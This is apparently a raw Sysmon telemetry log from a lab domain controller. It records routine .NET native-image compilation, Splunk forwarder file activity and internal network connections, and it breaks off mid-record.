10341000x800000000000000019072Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:27.560{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A127-60D3-9E02-00000000CF01}6568C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781
10341000x800000000000000019071Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:27.545{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A127-60D3-9E02-00000000CF01}6568C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f
10341000x800000000000000019070Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:27.545{4DB9351A-A036-60D3-1601-00000000CF01}6804348C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{4DB9351A-A127-60D3-9E02-00000000CF01}6568C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+77c6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d26|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9828|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+74ce|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+7395|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2bd9|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8c07|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2130|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f0f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+29e1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2969|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781
11241100x800000000000000019069Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:01:27.420{4DB9351A-A125-60D3-9D02-00000000CF01}6688C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\1a20-0\System.ServiceModel.Web.dll2021-06-23 21:01:27.420
23542300x800000000000000019068Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:27.154{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AA9690E4B4A571DF815994BDB1CA5FE6,SHA256=BDA0D8ACD25D12B4F56FD4672801A0B0E7580EE395DDDD4DA2C2720824C7B790,IMPHASH=00000000000000000000000000000000falsetrue
23542300x800000000000000019080Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:28.920{4DB9351A-A127-60D3-9F02-00000000CF01}6968NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\CXT5AL39J0\System.Speech.ni.dll.auxMD5=E6E3B69558422B846620014F4B4BDEF9,SHA256=D9BB2FD2E5905509168777C231A579DFAB24E1A8E1E4F7FBBAA4A2357574DB5B,IMPHASH=00000000000000000000000000000000falsetrue
23542300x800000000000000019079Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:28.920{4DB9351A-A127-60D3-9F02-00000000CF01}6968NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\CXT5AL39J0\System.Speech.ni.dllMD5=707DF04B3DBB37B911D91E9EF789D44E,SHA256=26AB4B98729C63EFAC8E1FA8C2570571F22AF9345E904460823DD709C1127152,IMPHASH=00000000000000000000000000000000truetrue
11241100x800000000000000019078Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:01:28.873{4DB9351A-A127-60D3-9F02-00000000CF01}6968C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\1b38-0\System.Speech.dll2021-06-23 21:01:28.873
23542300x800000000000000019077Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:28.685{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=ACF4D608EA9D30DB2ECE1851642FC224,SHA256=A9AD08C4C236BA50A2197F63080C5024E1F189007E02851B3B302C940591B330,IMPHASH=00000000000000000000000000000000falsetrue
23542300x800000000000000019076Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:28.263{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=911CA334AB6F5E15B416C70A7730FFA7,SHA256=BA69D8590E95DAB595B628CBAD78287955418C0C6F267E9AA180403D8E9FD341,IMPHASH=00000000000000000000000000000000falsetrue
10341000x800000000000000019087Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:29.310{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A129-60D3-A102-00000000CF01}4836C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781
10341000x800000000000000019086Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:29.310{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A129-60D3-A102-00000000CF01}4836C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f
10341000x800000000000000019085Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:29.310{4DB9351A-A036-60D3-1601-00000000CF01}6805292C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{4DB9351A-A129-60D3-A102-00000000CF01}4836C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+b591|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+b518|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9e05|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781
23542300x800000000000000019084Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:29.263{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1FF3F49A06D35FCD71E78E416BC477C4,SHA256=2CB8B90B1B5661100C32CA9C307BCD6474B377315260F836F2C944B585454AAC,IMPHASH=00000000000000000000000000000000falsetrue
10341000x800000000000000019083Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:29.045{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A129-60D3-A002-00000000CF01}6960C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781
10341000x800000000000000019082Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:29.015{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A129-60D3-A002-00000000CF01}6960C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f
10341000x800000000000000019081Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:29.015{4DB9351A-A036-60D3-1601-00000000CF01}6804348C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{4DB9351A-A129-60D3-A002-00000000CF01}6960C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+77c6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d26|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9828|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+74ce|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+7395|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2bd9|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8c07|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2130|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f0f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+29e1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2969|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781
354300x800000000000000019090Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:29.113{4DB9351A-9DF7-60D3-6D00-00000000CF01}3888C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-663.attackrange.local61371-false10.0.1.12-8000-
23542300x800000000000000019089Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:30.290{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DA90B499592C15B48454FC861053F1B0,SHA256=AD3FFF68BC8F2712F22B9F2450DB98C151F684E012FCC203A79C9654E8E87B5E,IMPHASH=00000000000000000000000000000000falsetrue
23542300x800000000000000019088Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:30.040{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=9F4A3344DE59AFACEBDF71CA840DAC95,SHA256=6B05E2AC8457147E4733F2BE8B2A829791A6E1A92B2619F5335E35A5E81A3EDF,IMPHASH=00000000000000000000000000000000falsetrue
23542300x800000000000000019091Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:31.322{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=160F70019BF6FA8B91C853FA93D150F4,SHA256=FE6EDCA3121178B99DCB882E0288A9896B0F758873AD494F8BE40B26DB7C12A9,IMPHASH=00000000000000000000000000000000falsetrue
23542300x800000000000000019092Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:32.337{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6BEA06C12F0AFC43A600F8C3114D6EFE,SHA256=D1ACBA40FE92C5B770B2FBC44E7DCF51EDCC86DBCF5962303F1CE922169FAC3E,IMPHASH=00000000000000000000000000000000falsetrue
23542300x800000000000000019093Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:33.353{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D352DCAF9FB89DBDE2B42445509BBB2F,SHA256=6B33A0F158DA500CC523DB215626ED300DE4D7CD374900FC98F24E08B494BDD6,IMPHASH=00000000000000000000000000000000falsetrue
23542300x800000000000000019094Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:34.369{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E5CF86F6C2CF209FAA2DA029C7B71C6A,SHA256=790D3FBB36A747897F2FB18ABE4A125EFA1C38930226111BD68103E5921C1E67,IMPHASH=00000000000000000000000000000000falsetrue
23542300x800000000000000019095Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:35.415{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8058AFA6B19836C24F59F5D624DBFC40,SHA256=5211539FF81EF24C39ADD4F35434321C4511E9295084A093B42736BE456C046E,IMPHASH=00000000000000000000000000000000falsetrue
11241100x800000000000000019098Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:01:36.853{4DB9351A-A129-60D3-A102-00000000CF01}4836C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\12e4-0\System.Web.dll2021-06-23 21:01:36.853
354300x800000000000000019097Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:35.125{4DB9351A-9DF7-60D3-6D00-00000000CF01}3888C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-663.attackrange.local61372-false10.0.1.12-8000-
23542300x800000000000000019096Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:36.415{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FB5BFBC2E4A7A79813EC1BAA1B5B110A,SHA256=8E94EAD2B15EDFB9E34CDB0841BBAF605042A4F7169A4CD1E5A6EE4484B70545,IMPHASH=00000000000000000000000000000000falsetrue
10341000x800000000000000019116Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:37.962{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A131-60D3-A502-00000000CF01}6424C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781
10341000x800000000000000019115Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:37.947{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A131-60D3-A502-00000000CF01}6424C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f
10341000x800000000000000019114Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:37.947{4DB9351A-A036-60D3-1601-00000000CF01}6805292C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{4DB9351A-A131-60D3-A502-00000000CF01}6424C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+b591|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+b518|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9e05|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781
10341000x800000000000000019113Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:37.915{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A131-60D3-A402-00000000CF01}4592C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781
10341000x800000000000000019112Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:37.900{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A131-60D3-A402-00000000CF01}4592C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f
10341000x800000000000000019111Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:37.900{4DB9351A-A036-60D3-1601-00000000CF01}6804348C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{4DB9351A-A131-60D3-A402-00000000CF01}4592C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+77c6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d26|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9828|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+74ce|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+7395|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2bd9|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8c07|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2130|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f0f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+29e1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2969|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781
23542300x800000000000000019110Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:37.853{4DB9351A-A131-60D3-A302-00000000CF01}5804NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\GMT7Y5YGDN\System.Web.Abstractions.ni.dll.auxMD5=AA12FB15CD84FE22BF84E10CE38D7B76,SHA256=A4703406C4CAC95E82DE00395AC1A5319B8FCEED28FE01A44E3D0B2270DDA9A1,IMPHASH=00000000000000000000000000000000falsetrue
23542300x800000000000000019109Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:37.853{4DB9351A-A131-60D3-A302-00000000CF01}5804NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\GMT7Y5YGDN\System.Web.Abstractions.ni.dllMD5=548842E659EBDC1404A4C1C8EBE6E83C,SHA256=870B6C8418F6F920A88A86D2582C7D1B06113086F6E5EC91DFB5108977C2E7BF,IMPHASH=00000000000000000000000000000000truetrue 11241100x800000000000000019108Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:01:37.837{4DB9351A-A131-60D3-A302-00000000CF01}5804C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\16ac-0\System.Web.Abstractions.dll2021-06-23 21:01:37.837 10341000x800000000000000019107Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 